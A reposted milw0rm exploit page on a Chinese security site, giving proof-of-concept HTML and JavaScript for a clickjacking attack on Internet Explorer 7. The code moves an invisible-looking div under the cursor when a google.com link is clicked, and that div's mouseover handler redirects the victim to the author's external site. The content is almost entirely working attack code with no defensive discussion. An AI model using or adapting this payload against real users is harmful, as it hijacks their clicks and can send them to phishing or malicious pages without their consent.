首页 网络安全 安全学院 查看内容

Internet Explorer 7 ClickJacking Vulnerability (2009-01-23)

2009-1-30 12:50 596 0

摘要: ############################################################## Application Name : İnterne...
关键词: Clickjacking Application Vulnerable com Explorer nternet google Author UzmiX milw

############################################################## Application Name : İnternet Explorer 7 # Vulnerable Type : Clickjacking # Author : UzmiX ############################################################# < ------------------- header data end of ------------------- > <html> <body> <div id="open" onmouseover="document.location='http://www.uzmix.net';" style="position:absolute;width:8px;height:7px;background:#FFFFFF;border:1px"></div> <script> function updatebox(evt) { mouseX=evt.pageX?evt.pageX:evt.clientX; mouseY=evt.pageY?evt.pageY:evt.clientY; document.getElementById('open').style.left=mouseX-2; document.getElementById('open').style.top=mouseY-2; } </script> <center> <br> <br> <a href="http://www.google.com" onclick="updatebox(event)"><font style="font-family:arial;font-size:32px">http://www.google.com</font></a> </html># milw0rm.com [2009-01-29]
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部